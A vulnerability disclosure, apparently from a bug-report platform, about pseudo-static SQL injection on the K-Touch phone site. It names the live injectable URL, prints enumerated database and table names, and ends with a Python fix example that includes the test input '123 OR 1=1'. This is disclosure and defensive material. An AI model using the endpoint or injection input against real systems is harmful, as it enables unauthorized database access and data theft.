
Tianyu (K-Touch) mobile phone official site: pseudo-static SQL injection vulnerability

Test URL: http://www.k-touch.cn/product/condetail/prod_id/123.html

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
available databases [5]:
[*] donglonghai
[*] information_schema
[*] mysql
[*] qiangguo
[*] renshe

current database: 'renshe'

Database: renshe
[48 tables]
+-------------------+
| yan_access        |
| yan_ad            |
| yan_admin         |
| yan_announce      |
| yan_answer        |
| yan_baoming       |
| yan_bjcx          |
| yan_bs            |
| yan_bscategory    |
| yan_bszn          |
| yan_bszncategory  |
| yan_case          |
| yan_casecategory  |
| yan_category      |
| yan_city          |
| yan_cx            |
| yan_cxcategory    |
| yan_downcategory  |
| yan_download      |
| yan_gk            |
| yan_gkcategory    |
| yan_goodscategory |
| yan_guanggao      |
| yan_hdjl          |
| yan_jgxx          |
| yan_jianli        |
| yan_link          |
| yan_member        |
| yan_msg           |
| yan_news          |
| yan_node          |
| yan_one           |
| yan_onecategory   |
| yan_page          |
| yan_province      |
| yan_role          |
| yan_role_user     |
| yan_sound         |
| yan_special       |
| yan_ticket        |
| yan_toupiao       |
| yan_type          |
| yan_user          |
| yan_xwzx          |
| yan_xwzxcategory  |
| yan_zcfg          |
| yan_zxtype        |
| yan_zxzx          |
+-------------------+

There are many sensitive tables. I tested this yesterday and did not dump the database.

Fix:

Filter the input.
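What filtering means for a pseudo-static URL shaped like the test URL above, shown as an added example (not code from the original report or from the affected site): the path segment before `.html` is still user input, so it is allow-listed as digits and bound as a query parameter. The `product` table, the function names, and the SQLite stand-in for MySQL are assumptions made for illustration.

```python
import re
import sqlite3

def make_db():
    """Constructed stand-in for the product table (the real back end was MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (prod_id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO product VALUES (?, ?)",
                   [(123, "phone A"), (124, "phone B"), (125, "phone C")])
    return db

# A rewrite rule maps /product/condetail/prod_id/<value>.html to a parameter.
# The URL looks like a static file, but <value> is attacker-controlled.
LOOSE_ROUTE = re.compile(r"^/product/condetail/prod_id/(.+)\.html$")
STRICT_ROUTE = re.compile(r"/product/condetail/prod_id/([0-9]{1,9})\.html")

def lookup_vulnerable(db, path):
    """'Before' form: the path segment is concatenated into the SQL text."""
    m = LOOSE_ROUTE.match(path)
    if not m:
        return None
    sql = "SELECT name FROM product WHERE prod_id = " + m.group(1)
    return [row[0] for row in db.execute(sql)]

def lookup_hardened(db, path):
    """Allow-list the segment as digits only, then bind it as a parameter."""
    m = STRICT_ROUTE.fullmatch(path)
    if not m:
        return None  # caller should answer 404 and log the rejected path
    rows = db.execute("SELECT name FROM product WHERE prod_id = ?",
                      (int(m.group(1)),))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    good = "/product/condetail/prod_id/123.html"
    bad = "/product/condetail/prod_id/123 OR 1=1.html"  # constructed test input
    print("vulnerable:", lookup_vulnerable(db, good), lookup_vulnerable(db, bad))
    print("hardened:  ", lookup_hardened(db, good), lookup_hardened(db, bad))
```

The allow-list and the bound parameter are independent layers: the parameterized query alone already stops the injection, and the strict route keeps malformed identifiers out of the application and makes rejected requests easy to log.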
